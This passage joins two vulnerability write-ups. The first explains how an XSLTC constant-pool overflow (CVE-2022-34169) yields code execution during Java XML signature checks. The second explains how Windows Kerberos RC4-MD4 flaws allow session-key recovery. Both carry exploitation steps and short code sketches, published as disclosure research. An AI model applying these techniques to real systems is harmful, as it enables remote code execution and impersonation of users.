XSLTC is responsible for compiling XSLT stylesheets into Java classes to improve performance compared to a naive interpretation-based approach. While this has advantages when repeatedly running the same stylesheet over large amounts of data, it is a somewhat surprising choice in the context of XML signature validation. Thinking about this from an attacker's perspective, we can now provide arbitrary inputs to a fully-featured JIT compiler. Talk about an unexpected attack surface!
A bug in XSLTC
/**
* As Gregor Samsa awoke one morning from uneasy dreams he found himself
* transformed in his bed into a gigantic insect. He was lying on his hard,
* as it were armour plated, back, and if he lifted his head a little he
* could see his big, brown belly divided into stiff, arched segments, on
* top of which the bed quilt could hardly keep in position and was about
* to slide off completely. His numerous legs, which were pitifully thin
* compared to the rest of his bulk, waved helplessly before his eyes.
* "What has happened to me?", he thought. It was no dream....
Turns out that the author of this codebase was a Kafka fan.
So what does this compilation process look like? XSLTC takes a XSLT stylesheet as input and returns a JIT'ed Java class, called translet, as output. The JVM then loads this class, constructs it and the XSLT runtime executes the transformation via a JIT'ed method.
Java class files contain the JVM bytecode for all class methods, a so-called constant pool describing all constants used and other important runtime details such as the name of its super class or access flags.
ClassFile {
    u4             magic;
    u2             minor_version;
    u2             major_version;
    u2             constant_pool_count;
    cp_info        constant_pool[constant_pool_count-1]; // cp_info is a variable-sized object
    u2             access_flags;
    u2             this_class;
    u2             super_class;
    u2             interfaces_count;
    u2             interfaces[interfaces_count];
    u2             fields_count;
    field_info     fields[fields_count];
    u2             methods_count;
    method_info    methods[methods_count];
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}
XSLTC depends on the Apache Byte Code Engineering Library (BCEL) to dynamically create Java class files. As part of the compilation process, constants in the XSLT input such as strings or numbers get translated into Java constants, which are then stored in the constant pool. The following code snippet shows how an XSLT integer expression gets compiled: small integers that fit into a byte or short are stored inline in bytecode using the bipush or sipush instructions, while larger ones are added to the constant pool using the cp.addInteger method:
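Paraphrased from BCEL's PUSH helper, which XSLTC uses to emit integer constants:

public PUSH(final ConstantPoolGen cp, final int value) {
    if ((value >= -1) && (value <= 5)) {
        instruction = InstructionConst.getInstruction(Const.ICONST_0 + value);  // tiny: iconst_n
    } else if (Instruction.isValidByte(value)) {
        instruction = new BIPUSH((byte) value);                                 // fits a byte
    } else if (Instruction.isValidShort(value)) {
        instruction = new SIPUSH((short) value);                                // fits a short
    } else {
        instruction = new LDC(cp.addInteger(value));                            // constant pool entry
    }
}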
The problem with this approach is that neither XSLTC nor BCEL correctly limits the size of the constant pool. As constant_pool_count, which describes the size of the constant pool, is only 2 bytes long, its maximum size is limited to 2**16 - 1 or 65535 entries. In practice even fewer entries are possible, because some constant types take up two entries. However, BCEL's internal constant pool representation uses a standard Java array for storing constants and does not enforce any limit on its length.
When XSLTC processes a stylesheet that contains more constants than that, and BCEL's internal class representation is serialized to a class file at the end of the compilation process, the array length is truncated to a short, but the complete array is written out.
This means that constant_pool_count will now contain a small value and that parts of the attacker-controlled constant pool will get interpreted as the class fields following the constant pool, including method and attribute definitions.
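The arithmetic of the overflow can be sketched as follows (a hypothetical serializer, not the BCEL code):

import struct

def serialize_pool(entries):
    # Sketch of the bug: constant_pool_count is written as a u2 and
    # silently wraps, but the full oversized entry array still follows.
    out = struct.pack(">H", len(entries) & 0xFFFF)
    for entry in entries:
        out += entry
    return out

# 0x10703 entries serialize with a count field of 0x703: the parser
# stops counting there, and entry 0x703 onwards is read as the class
# header (access_flags, this_class, super_class, ...).
print(hex(0x10703 & 0xFFFF))  # 0x703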
Exploiting a constant pool overflow
To understand how we can exploit this, we first need to take a closer look at the content of the constant pool. Each entry in the pool starts with a 1-byte tag describing the kind of constant, followed by the actual data. The table below shows an incomplete list of constant types supported by the JVM (see the official documentation for a complete list). No need to read through all of them but we will come back to this table a lot when walking through the exploit.
Describes a string in the JVM's "modified UTF-8" encoding (tag 0x01).
CONSTANT_Utf8_info {
    u1 tag;
    u2 length;
    u1 bytes[length];
}
Describes an 8-byte long constant (tag 0x05). Takes up two constant pool entries.
CONSTANT_Long_info {
    u1 tag;
    u4 high_bytes;
    u4 low_bytes;
}
Describes an 8-byte double constant (tag 0x06). Takes up two constant pool entries.
CONSTANT_Double_info {
    u1 tag;
    u4 high_bytes;
    u4 low_bytes;
}
Describes a class. Points to a UTF8 constant containing its name (tag 0x07).
CONSTANT_Class_info {
    u1 tag;
    u2 name_index;
}
Describes a string object. Points to a UTF8 constant with its content (tag 0x08).
CONSTANT_String_info {
    u1 tag;
    u2 string_index;
}
Describes a method type. Points to a UTF8 constant containing a method descriptor (tag 0x10).
CONSTANT_MethodType_info {
    u1 tag;
    u2 descriptor_index;
}
A perfect constant type for exploiting CVE-2022-34169 would be dynamically sized and contain fully attacker-controlled content. Unfortunately, no such type exists. While CONSTANT_Utf8 is dynamically sized, its content isn't a raw string representation but an encoding the JVM calls "modified UTF-8". This encoding introduces some significant restrictions on the data stored and rules out null bytes, making it mostly useless for corrupting class fields.
The next best thing we can get is a fixed size constant type with full control over the content. CONSTANT_Long seems like an obvious candidate, but XSLTC never creates attacker-controlled long constants during the compilation process. Instead we can use large floating point numbers to create CONSTANT_Double entries with (almost) fully controlled content. This gives us a nice primitive where we can corrupt class fields behind the constant pool with a byte pattern like 0x06 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0x06 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0x06 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ.
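As a sketch of this primitive (the target bytes here are made up for illustration):

import struct

# Hypothetical target bytes for one corrupted header field; the real
# exploit chooses them to form valid class file fields.
wanted = bytes.fromhex("0007040000000002")

# Interpreted as an IEEE-754 double, these bytes become a (weird but
# valid) number we can embed in the stylesheet; XSLTC stores it as a
# CONSTANT_Double whose pool entry is the tag 0x06 followed by exactly
# these 8 bytes.
literal = struct.unpack(">d", wanted)[0]
assert struct.pack(">d", literal) == wanted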
Unfortunately, this primitive alone isn’t sufficient for crafting a useful class file due to the requirements of the fields right after the constant_pool:
cp_info constant_pool[constant_pool_count-1];
u2 access_flags;
u2 this_class;
u2 super_class;
access_flags is a big-endian mask of flags describing access permissions and properties of the class.
While the JVM is happy to ignore unknown flag values, we need to avoid setting flags like ACC_INTERFACE (0x0200) or ACC_ABSTRACT (0x0400) that result in an unusable class. This means that we can’t use a CONSTANT_Double entry as our first out-of-bound constant as its tag byte of 0x06 will get interpreted as these flags.
this_class is an index into the constant pool and has to point to a CONSTANT_Class entry that describes the class defined with this file. Fortunately, neither the JVM nor XSLTC cares much about which class we pretend to be, so this value can point to almost any CONSTANT_Class entry that XSLTC ends up generating. (The only restriction is that it can’t be a part of a protected namespace like java.lang.)
super_class is another index to a CONSTANT_Class entry in the constant pool. While the JVM is happy with any class, XSLTC expects this to be a reference to the org.apache.xalan.xsltc.runtime.AbstractTranslet class, otherwise loading and initialization of the class file fails.
After a lot of trial and error I ended up with the following approach to meet these requirements:
We craft an XSLT input that results in 0x10703 constants in the pool. This will result in a truncated pool size of 0x703, and the start of the constant at index 0x703 (due to 0-based indexing) will be interpreted as access_flags.
During compilation of the input, we trigger the addition of a new string constant when the pool has 0x702 constants. This will first create a CONSTANT_Utf8 entry at index 0x702 and a CONSTANT_String entry at 0x703. The String entry will reference the preceding Utf8 constant, so its value will be the tag byte 0x08 followed by the index 0x07 0x02. This results in a usable access_flags value of 0x0807.
Add a CONSTANT_Double entry at index 0x704. Its 0x06 tag byte will be interpreted as part of the this_class field. The following 2 bytes can then be used to control the value of the super_class field. By setting the next 4 bytes to 0x00, we create empty interfaces and fields arrays, before setting the last two bytes to the number of methods we want to define.
The only remaining requirement is that we need to add a CONSTANT_Class entry at index 0x206 of the constant pool, which is relatively straightforward.
The generated XSLT input overwrites the first header fields as follows: after filling the constant pool with a large number of string constants for the attribute fields and values, the CONST_STRING entry for the `jEb` element ends up at index 0x703, and a call to the XSLT `ceiling` function then triggers the addition of a controlled CONST_DOUBLE entry at index 0x704.
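The original PoC input isn't reproduced here, but a hypothetical generator for this kind of stylesheet could look like the following sketch (element names, filler counts and the double literal are placeholders rather than the real payload):

def make_stylesheet(n_fill, double_literal):
    # Placeholder generator, not the real PoC: the filler elements pump
    # string constants into the pool so that the CONST_STRING for <jEb/>
    # lands at index 0x703 and the double constant at index 0x704.
    fill = "".join(f'<x a{i}="pad{i}"/>' for i in range(n_fill))
    return (
        '<xsl:stylesheet version="1.0" '
        'xmlns:xsl="http://www.w3.org/1999/XSL/Transform">'
        '<xsl:template match="/">'
        + fill
        + "<jEb/>"
        # XPath 1.0 number literals have no exponent notation, so the
        # chosen double has to be expressible as a plain decimal
        + f"<xsl:value-of select='ceiling({double_literal})'/>"
        + "</xsl:template></xsl:stylesheet>"
    )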
We have constructed the initial header fields and are now in the interesting part of the class file definition: the methods table. This is where all methods of a class and their bytecode are defined. After XSLTC generates a Java class, the XSLT runtime will load the class and instantiate an object, so the easiest way to achieve arbitrary code execution is to create a malicious constructor. Let's take a look at the methods table to see how we can define a working constructor:
ClassFile {
    [...]
    u2 methods_count;
    method_info methods[methods_count];
    [...]
}
method_info {
    u2 access_flags;
    u2 name_index;
    u2 descriptor_index;
    u2 attributes_count;
    attribute_info attributes[attributes_count];
}

attribute_info {
    u2 attribute_name_index;
    u4 attribute_length;
    u1 info[attribute_length];
}
Code_attribute {
    u2 attribute_name_index;
    u4 attribute_length;
    u2 max_stack;
    u2 max_locals;
    u4 code_length;
    u1 code[code_length];
    u2 exception_table_length;
    {   u2 start_pc;
        u2 end_pc;
        u2 handler_pc;
        u2 catch_type;
    } exception_table[exception_table_length];
    u2 attributes_count;
    attribute_info attributes[attributes_count];
}
The methods table is a dynamically sized array of method_info structs. Each of these structs describes the access_flags of the method, an index into the constant table that points to its name (as a utf8 constant), and another index pointing to the method descriptor (another CONSTANT_Utf8).
This is followed by the attributes table, a dynamically sized map from Utf8 keys stored in the constant table to dynamically sized values stored inline. Fortunately, the only attribute we need to provide is the Code attribute, which contains the actual bytecode of the method.
Going back to our payload, we can see that the start of the methods table is aligned with the tag byte of the next entry in the constant pool table. This means that the 0x06 tag of a CONSTANT_Double would clobber the access_flags field of the first method, making it unusable for us. Instead we have to create two methods: the first one as a basic filler to get the alignment right, and the second one as the actual constructor. Fortunately, the JVM ignores unknown attributes, so we can use dynamically sized attribute values. Using a series of CONST_DOUBLE entries, we can create a constructor method with an almost fully controlled body.
We still need to bypass one limitation: JVM bytecode does not work standalone, but references and relies on entries in the constant pool. Instantiating a class or calling a method requires a corresponding constant entry in the pool. This is a problem as our bug doesn’t give us the ability to create fake constant pool entries so we are limited to constants that XSLTC adds during compilation.
Luckily, there is a way to add arbitrary class and method references to the constant pool: Java’s XSLT runtime supports calling arbitrary Java methods. As this is clearly insecure, this functionality is protected by a runtime setting and always disabled during signature verification.
However, XSLTC will still process and compile these function calls when processing a stylesheet; the call is only blocked at runtime (see the corresponding code in FunctionCall.java). This means that we can get references to all required methods and classes into the constant pool by adding an XSLT element that calls the Java methods we need.
There are two final checks we need to bypass, before we end up with a working class file:
The JVM enforces that every constructor of a subclass calls a superclass constructor before returning. This check can be bypassed by never returning from our constructor, either by adding an endless loop at the end or by throwing an exception, which is the approach I used in my exploit proof-of-concept. A slightly more complex, but cleaner, approach is to add a reference to the AbstractTranslet constructor to the constant pool and call it. This is the approach used by thanat0s in their exploit writeup.
Finally, we need to skip over the rest of XSLTC’s output. This can be done by constructing a single large attribute with the right size as an element in the class attribute table.
Once we chain all of this together we end up with a signed XML document that can trigger the execution of arbitrary JVM bytecode during signature verification. I’ve skipped over some implementation details of this exploit, so if you want to reproduce this vulnerability please take a look at the heavily commented proof-of-concept script.
Impact and Restrictions
In theory every unpatched Java application that processes XML signatures is vulnerable to this exploit. However, there are two important restrictions:
As references are only processed after the signature of the SignedInfo element is verified, applications can be protected by their usage of the KeySelector class. Applications that use an allowlist of trusted keys in their KeySelector will be protected as long as these keys are not compromised. An example of this would be a single-tenant SAML SP configured with a single trusted IdP key. In practice, a lot of these applications are still vulnerable, as they don't use KeySelector directly and instead enforce this restriction in their own application logic after an unrestricted signature validation; at that point the vulnerability has already been triggered. Multi-tenant SAML applications that support customer-provided Identity Providers, as most modern cloud SaaS products do, are also not protected by this limitation.
SAML Identity Providers can only be attacked if they support (and verify) signed SAML requests.
Even without CVE-2022-34169, processing XSLT during signature verification can be easily abused as part of a DoS attack. For this reason, the org.jcp.xml.dsig.secureValidation property can be enabled to forbid XSLT transforms in XML signatures. Interestingly, this property defaults to false for all JDK versions below 17 if the application is not running under the Java Security Manager. As the Security Manager is rarely used for server-side applications and JDK 17 was only released a year ago, we expect that a lot of applications are not protected by this. Limited testing of large Java-based SSO providers confirmed this assumption. Another reason for a lack of widespread usage might be that org.jcp.xml.dsig.secureValidation also disables use of the SHA1 algorithm in newer JDK versions. As SHA1 is still widely used by enterprise customers, simply enabling the property without manually configuring a suitable jdk.xml.dsig.secureValidationPolicy might not be feasible.
Conclusion
XML signatures in general and SAML in particular offer a large and complex attack surface to external attackers. Even though Java offers configuration options that can be used to address this vulnerability, they are complex, might break real-world use cases and are off by default.
Developers that rely on SAML should make sure they understand the risks associated with it and should reduce the attack surface as much as possible by disabling functionality that is not required for their use case. Additional defense-in-depth approaches like early validation of signing keys, an allow-list based approach to valid transformation chains and strict schema validation of SAML tickets can be used for further hardening.
I've been spending a lot of time researching Windows authentication implementations, specifically Kerberos. In June 2022 I found an interesting issue (issue 2310) with the handling of RC4 encryption that allowed you to authenticate as another user, either if you could interpose on the Kerberos network traffic to and from the KDC, or directly if the user was configured to disable typical pre-authentication requirements.
This blog post goes into more detail on how this vulnerability works and how I was able to exploit it with only a bare minimum of brute forcing required. Note that I'm not going to spend time fully explaining how Kerberos authentication works; there are plenty of resources online. For example, this blog post by Steve Syfuhs, who works at Microsoft, is a good first start.
Background
Kerberos is a very old authentication protocol. The current version (v5) was described in RFC1510 back in 1993, although it was updated in RFC4120 in 2005. As Kerberos' core security concept is using encryption to prove knowledge of a user's credentials, the design allows for negotiating the encryption and checksum algorithms that the client and server will use.
For example, when sending the initial authentication service request (AS-REQ) to the Key Distribution Center (KDC), a client can specify a list of supported encryption algorithms, as predefined integer identifiers, as shown below in the snippet of the ASN.1 definition from RFC4120.
KDC-REQ-BODY ::= SEQUENCE {
...
etype [8] SEQUENCE OF Int32 -- EncryptionType
-- in preference order --,
...
}
When the server receives the request it checks its list of supported encryption types and the ones the user's account supports (which is based on what keys the user has configured) and then will typically choose the one the client most preferred. The selected algorithm is then used for anything requiring encryption, such as generating session keys or the EncryptedData structure as shown below:
EncryptedData ::= SEQUENCE {
etype [0] Int32 -- EncryptionType --,
kvno [1] UInt32 OPTIONAL,
cipher [2] OCTET STRING -- ciphertext
}
The KDC will send back an authentication service reply (AS-REP) structure containing the user's Ticket Granting Ticket (TGT) and an EncryptedData structure which contains the session key necessary to use the TGT to request service tickets. The user can then use their known key which corresponds to the requested encryption algorithm to decrypt the session key and complete the authentication process.
This flexibility in selecting an encryption algorithm is both a blessing and a curse. In the original implementations of Kerberos only DES encryption was supported, which by modern standards is far too weak. Because of this flexibility, developers were able to add support for AES through RFC3962, which is supported by all modern versions of Windows. This can then be negotiated between client and server to use the best algorithm both support. However, unless weak algorithms are explicitly disabled, there's nothing stopping a malicious client or server from downgrading the encryption algorithm in use and trying to break Kerberos using cryptographic attacks.
Modern versions of Windows have started to disable DES as a supported encryption algorithm, preferring AES. However, there's another encryption algorithm which Windows supports which is still enabled by default, RC4. This algorithm was used in Kerberos by Microsoft for Windows 2000, although its documentation was in draft form until RFC4757 was released in 2006.
The RC4 stream cipher has many substantial weaknesses, but when it was introduced it was still considered a better option than DES which has been shown to be sufficiently vulnerable to hardware cracking such as the EFF's "Deep Crack". Using RC4 also had the advantage that it was relatively easy to operate in a reduced key size mode to satisfy US export requirements of cryptographic systems.
If you read the RFC for the implementation of RC4 in Kerberos, you'll notice it doesn't use the stream cipher as is. Instead it puts in place various protections to guard against common cryptographic attacks:
The encrypted data is protected by a keyed MD5 HMAC hash to prevent tampering which is trivial with a simple stream cipher such as RC4. The hashed data includes a randomly generated 8-byte "confounder" so that the hash is randomized even for the same plain text.
The key used for the encryption is derived from the hash and a base key. This, combined with the confounder makes it almost certain the same key is never reused for the encryption.
The base key is not the user's key, but instead is derived from a MD5 HMAC keyed with the user's key over a 4 byte message type value. For example the message type is different for the AS-REQ and the AS-REP structures. This prevents an attacker using Kerberos as an encryption oracle and reusing existing encrypted data in unrelated parts of the protocol.
Many of the known weaknesses of RC4 are related to gathering a significant quantity of ciphertext encrypted with a known key. Due to the design of the RC4-HMAC algorithm and the general functional principles of Kerberos this is not really a significant concern. However, the biggest weakness of RC4 as defined by Microsoft for Kerberos is not so much the algorithm, but the generation of the user's key from their password.
As already mentioned Kerberos was introduced in Windows 2000 to replace the existing NTLM authentication process used from NT 3.1. However, there was a problem of migrating existing users to the new authentication protocol. In general the KDC doesn't store a user's password, instead it stores a hashed form of that password. For NTLM this hash was generated from the Unicode password using a single pass of the MD4 algorithm. Therefore to make an easy upgrade path Microsoft specified that the RC4-HMAC Kerberos key was this same hash value.
As the MD4 output is 16 bytes in size it wouldn't be practical to brute force the entire key. However, the hash algorithm has no protections against brute-force attacks: no salting, no multiple iterations. If an attacker has access to ciphertext encrypted using the RC4-HMAC key, they can attempt to brute force the key by guessing the password. As users tend to choose weak or trivial passwords, this increases the chance that a brute-force attack will recover the key. And with the key, the attacker can then authenticate as that user to any service they like.
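Concretely, a candidate RC4-HMAC key is a single MD4 call away from a password guess. A minimal sketch, assuming hashlib's MD4 is available (it depends on the OpenSSL build) and with check_key standing in for verification against captured ciphertext:

import hashlib

def rc4_hmac_key(password: str) -> bytes:
    # The RC4-HMAC key is the NT hash: unsalted, single-pass MD4 over
    # the UTF-16LE encoded password.
    return hashlib.new("md4", password.encode("utf-16-le")).digest()

def brute_force(wordlist, check_key):
    # check_key(key) is a stand-in for trying to decrypt captured
    # RC4-HMAC ciphertext with the candidate key.
    for guess in wordlist:
        if check_key(rc4_hmac_key(guess)):
            return guess
    return None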
To get appropriate ciphertext the attacker can make requests to the KDC and specify the encryption type they need. The most well known attack technique is called Kerberoasting. This technique requests a service ticket for the targeted user and specifies the RC4-HMAC encryption type as the preferred algorithm. If the user has an RC4 key configured then the ticket returned can be encrypted using the RC4-HMAC algorithm. As significant parts of the plain-text are known for the ticket data, the attacker can try to brute force the key from that.
This technique does require the attacker to have an account on the KDC to make the service ticket request. It also requires that the user account has a configured Service Principal Name (SPN) so that a ticket can be requested. Also, modern versions of Windows Server will try to block this attack by preferring AES keys, derived from the service user's password, over RC4, even if the attacker only requested RC4 support.
An alternative form is called AS-REP Roasting. Instead of requesting a service ticket this relies on the initial authentication requests to return encrypted data. When a user sends an AS-REQ structure, the KDC can look up the user, generate the TGT and its associated session key then return that information encrypted using the user's RC4-HMAC key. At this point the KDC hasn't verified the client knows the user's key before returning the encrypted data, which allows the attacker to brute force the key without needing to have an account themselves on the KDC.
Fortunately this attack is more rare because Windows's Kerberos implementation requires pre-authentication. For a password based logon the user uses their encryption key to encrypt a timestamp value which is sent to the KDC as part of the AS-REQ. The KDC can decrypt the timestamp, check it's within a small time window and only then return the user's TGT and encrypted session key. This would prevent an attacker getting encrypted data for the brute force attack.
However, Windows does support a user account flag, "Do not require Kerberos preauthentication". If this flag is enabled on a user the authentication request does not require the encrypted timestamp to be sent and the AS-REP roasting process can continue. This should be an uncommon configuration.
The success of the brute-force attack entirely depends on the password complexity. Typically service user accounts have a long, at least 25 character, randomly generated password which is all but impossible to brute force. Normal users would typically have weaker passwords, but they are less likely to have a configured SPN which would make them targets for Kerberoasting. The system administrator can also mitigate the attack by disabling RC4 entirely across the network, though this is not commonly done for compatibility reasons. A more limited alternative is to add sensitive users to the Protected Users Group, which disables RC4 for them without having to disable it across the entire network.
Windows Kerberos Encryption Implementation
While researching Windows Defender Credential Guard (CG) I wanted to understand how Windows actually implements the various Kerberos encryption schemes. The primary goal of CG, at least for Kerberos, is to protect the user's keys, specifically the ones derived from their password and the session keys for the TGT. If I could find a way of using one of the keys with a weak encryption algorithm, I hoped to be able to extract the original key, removing CG's protection.
The encryption algorithms are all implemented inside the CRYPTDLL.DLL library, which is separate from the core Kerberos library in KERBEROS.DLL on the client and KDCSVC.DLL on the server. This interface is undocumented, but it's fairly easy to work out how to call the exported functions. For example, the exported CDLocateCSystem function looks up a "crypto system" from the encryption type integer and returns a pointer to the corresponding KERB_ECRYPT structure.
The KERB_ECRYPT structure contains configuration information for the engine, such as the size of the key and function pointers to convert a password to a key, generate new session keys, and perform encryption or decryption. The structure also contains a textual name so that you can get a quick idea of what the algorithm is supposed to be, which led to the following list of supported systems:
Name                                     Encryption Type
----                                     ---------------
RSADSI RC4-HMAC                          24
RSADSI RC4-HMAC                          23
Kerberos AES256-CTS-HMAC-SHA1-96         18
Kerberos AES128-CTS-HMAC-SHA1-96         17
Kerberos DES-CBC-MD5                     3
Kerberos DES-CBC-CRC                     1
RSADSI RC4-MD4                           -128
Kerberos DES-Plain                       -132
RSADSI RC4-HMAC                          -133
RSADSI RC4                               -134
RSADSI RC4-HMAC                          -135
RSADSI RC4-EXP                           -136
RSADSI RC4                               -140
RSADSI RC4-EXP                           -141
Kerberos AES128-CTS-HMAC-SHA1-96-PLAIN   -148
Kerberos AES256-CTS-HMAC-SHA1-96-PLAIN   -149
Encryption types with positive values are well-known encryption types defined in the RFCs, whereas negative values are private types. Therefore I decided to spend my time on these private types. Most of the private types were just subtle variations on the existing well-known types, or clones with legacy numbers.
However, one stood out as being different from the rest, "RSADSI RC4-MD4" with type value -128. This was different because the implementation was incredibly insecure, specifically it had the following properties:
Keys are 16 bytes in size, but only the first 8 of the key bytes are used by the encryption algorithm.
The key is used as-is, there's no blinding so the key stream is always the same for the same user key.
The message type is ignored, which means that the key stream is the same for different parts of the Kerberos protocol when using the same key.
The encrypted data does not contain any cryptographic hash to protect from tampering with the ciphertext which for RC4 is basically catastrophic. Even though the name contains MD4 this is only used for deriving the key from the password, not for any message integrity.
Generated session keys are 16 bytes in size but only contain 40 bits (5 bytes) of randomness. The remaining 11 bytes are populated with the fixed value of 0xAB.
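To make the last property concrete, session key generation amounts to the following (a sketch of the described behavior, not the actual CRYPTDLL code):

import os

def rc4_md4_session_key() -> bytes:
    # 16 bytes on paper, 40 bits in practice: 5 random bytes followed
    # by 11 bytes of the fixed filler 0xAB.
    return os.urandom(5) + b"\xAB" * 11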
To say this is bad from a cryptographic standpoint is an understatement. Surely, though, while this crypto system is implemented in CRYPTDLL, it wouldn't actually be used by Kerberos? Unfortunately it is: the KDC accepts it as a valid encryption type when sent in the AS-REQ. The question then becomes how to exploit this behavior.
Exploitation on the Wire (CVE-2022-33647)
My first thoughts were to attack the session key generation. If we could get the server to return the AS-REP with a RC4-MD4 session key for the TGT then any subsequent usage of that key could be captured and used to brute force the 40 bit key. At that point we could take the user's TGT which is sent in the clear and the session key and make requests as that authenticated user.
The most obvious approach to forcing the preferred encryption type to be RC4-MD4 would be to interpose the connection between a client and the KDC. The etype field of the AS-REQ is not protected for password based authentication. Therefore a proxy can modify the field to only include RC4-MD4 which is then sent to the KDC. Once that's completed the proxy would need to also capture a service ticket request to get encrypted data to brute force.
Brute forcing the 40-bit key would be technically feasible, at least if you built a giant lookup table, but it isn't very practical. I realized there's a simpler way: when a client authenticates, it typically sends a request to the KDC with no pre-authentication timestamp present. As long as pre-authentication hasn't been disabled, the KDC returns a Kerberos error to the client with the KDC_ERR_PREAUTH_REQUIRED error code.
As part of that error response the KDC also sends a list of acceptable encryption types in the PA-ETYPE-INFO2 pre-authentication data structure. This list contains additional information for the password to key derivation such as the salt for AES keys. The client can use this information to correctly generate the encryption key for the user. I noticed that if you sent back only a single entry indicating support for RC4-MD4 then the client would use the insecure algorithm for generating the pre-authentication timestamp. This worked even if the client didn't request RC4-MD4 in the first place.
When the KDC received the timestamp, it would validate it using the RC4-MD4 algorithm and return the AS-REP with the TGT's RC4-MD4 session key encrypted using the same key as the timestamp. Due to the already mentioned weaknesses in the RC4-MD4 algorithm, the key stream used for the timestamp must be the same as the one used in the response to encrypt the session key. Therefore we can mount a known-plaintext attack to recover the key stream from the timestamp and use that to decrypt parts of the response.
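Since the identical key stream encrypts both messages, the recovery is a pair of XORs, as in this sketch with hypothetical captured buffers:

def recover_asrep_prefix(enc_timestamp: bytes, timestamp_plain: bytes,
                         enc_asrep: bytes) -> bytes:
    # Keystream reuse: XORing the encrypted timestamp with its known
    # plaintext yields the key stream, which then decrypts the
    # overlapping prefix of the encrypted AS-REP.
    keystream = bytes(c ^ p for c, p in zip(enc_timestamp, timestamp_plain))
    return bytes(c ^ k for c, k in zip(enc_asrep, keystream))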
The timestamp itself has the following ASN.1 structure, which is serialized using the Distinguished Encoding Rules (DER) and then encrypted.
PA-ENC-TS-ENC ::= SEQUENCE {
patimestamp [0] KerberosTime -- client's time --,
pausec [1] Microseconds OPTIONAL
}
The AS-REP encrypted response has the following ASN.1 structure:
EncASRepPart ::= SEQUENCE {
key [0] EncryptionKey,
last-req [1] LastReq,
nonce [2] UInt32,
key-expiration [3] KerberosTime OPTIONAL,
flags [4] TicketFlags,
authtime [5] KerberosTime,
starttime [6] KerberosTime OPTIONAL,
endtime [7] KerberosTime,
renew-till [8] KerberosTime OPTIONAL,
srealm [9] Realm,
sname [10] PrincipalName,
caddr [11] HostAddresses OPTIONAL
}
We can see from the two structures that, as luck would have it, the session key in the AS-REP is at the start of the encrypted data. This means there is an overlap between the known parts of the timestamp and the key, allowing us to apply key stream recovery to decrypt most of the session key without any brute force.
Lining up the ASN.1 DER structures of the timestamp and the start of the AS-REP shows the overlap. The bytes we know or can calculate are the parts of the ASN.1 structure itself, such as types and lengths, and 4 of those known timestamp bytes line up with the first 4 bytes of the session key. We only need the first 5 bytes of the key due to the padding at the end, so this leaves a single final key byte to brute force.
We can do this brute force in one of two ways. First, we can send service ticket requests with the user's TGT and a guess for the session key to the KDC until one succeeds. This would require at most 256 requests to the KDC. Alternatively, we can capture a service ticket request from the client, which is likely to happen immediately after the authentication. As the service ticket request will be encrypted using the session key, we can perform the brute-force attack locally without needing to talk to the KDC, which will be faster. Regardless of the option chosen, this approach is orders of magnitude faster than brute forcing the entire 40-bit session key.
The simplest approach to performing this exploit would be to interpose the client to server connection and modify traffic. However, as the initial request without pre-authentication just returns an error message, it's likely the exploit could be done by injecting a response back to the client while the KDC is processing the real request. This could be done with only the ability to monitor network traffic and inject arbitrary network traffic back into that network. However, I've not verified that approach.
Exploitation without Interception (CVE-2022-33679)
The requirement to have access to the client to server authentication traffic does make this vulnerability seem less impactful, although there are plenty of scenarios where an attacker could interpose: shared Wi-Fi networks, for example, or physical attacks compromising the computer account authentication which takes place when a domain joined system is booted.
It would be interesting if there was an attack vector to exploit this without needing a real Kerberos user at all. I realized that if a user has pre-authentication disabled then we have everything we need to perform the attack. The important point is that if pre-authentication is disabled we can request a TGT for the user, specifying RC4-MD4 encryption and the KDC will send back the AS-REP encrypted using that algorithm.
The key to the exploit is to reverse the previous attack: instead of using the timestamp to decrypt the AS-REP, we'll use the AS-REP to encrypt a timestamp. We can then use the KDC's handling of that timestamp as an encryption oracle and brute force enough bytes of the key stream to decrypt the TGT's session key. To maximize the overlap, we remove the optional microseconds component from the DER encoded timestamp.
Initially there is no overlap between the timestamp bytes and the 40-bit session key. However, we know, or at least can calculate, the entire DER encoded data of the AS-REP that covers the timestamp buffer. We can use this to calculate the key stream for the user's RC4-MD4 key without actually knowing the key itself. With the key stream we can encrypt a valid timestamp and send it to the KDC.
If the KDC responds with a valid AS-REP then we know we've correctly calculated the key stream. How can we use this to start decrypting the session key? The KerberosTime value used for the timestamp is an ASCII string of the form YYYYMMDDHHmmssZ. The KDC parses the time as a NUL terminated string, so we can add an additional NUL character to the end of the string and it shouldn't affect the parsing.
We can now guess a value for the encrypted NUL character and send the new timestamp to the KDC. If the KDC returns an error we know that the parsing failed as it didn't decrypt to a NUL character. However, if the authentication succeeds the value we guessed is the next byte in the key stream and we can decrypt the first byte of the session key.
At this point we've got a problem: we can't just add another NUL character, as the parser would stop on the first one we sent, and even if the value didn't decrypt to a NUL it wouldn't be possible to detect. This is where a second trick comes into play: instead of extending the string, we can abuse the way value lengths are encoded in DER. A length can be in one of two forms: a short form if the length is less than 128, or a long form for everything else.
For the short form the length is encoded in a single byte. For the long form, the first byte has the top bit set to 1 and the lower 7 bits encode the number of trailing bytes of the length value, which follows in big-endian format. For example, the timestamp's total size of 0x14 bytes can be stored in the short form as the single byte 0x14, or in an arbitrarily sized long form: 0x81 0x14, 0x82 0x00 0x14, 0x83 0x00 0x00 0x14 etc. Each added length byte moves the trailing NUL character one position further into the session key, letting us brute force the next bytes, as sketched below.
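A sketch of this length trick:

def der_length(n: int, pad_to: int = 0) -> bytes:
    # Encode a DER length; pad_to > 0 forces an unnecessarily long
    # long-form encoding, which strict DER forbids but the Microsoft
    # ASN.1 parser accepts.
    if pad_to == 0:
        return bytes([n])                      # short form (n < 0x80)
    return bytes([0x80 | pad_to]) + n.to_bytes(pad_to, "big")

for pad in range(4):
    print(der_length(0x14, pad).hex())
# 14, 8114, 820014, 83000014: each extra length byte shifts the
# trailing NUL guess one byte further into the session key.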
Even though technically DER requires the shortest form necessary to encode the length, the Microsoft ASN.1 library doesn't enforce that when parsing, so we can just repeat this length encoding trick to cover the remaining 4 unknown bytes of the key. As the exploit brute forces one byte at a time, the maximum number of requests that we'd need to send to the KDC is 5 × 2^8 = 1280 requests, as opposed to 2^40 requests, which would be around 1 trillion.
Even with such a small number of requests it can still take around 30 seconds to brute force the key, but that still makes it a practical attack. Although it would be very noisy on the network and you'd expect any competent EDR system to notice, it might be too late at that point.
The Fixes
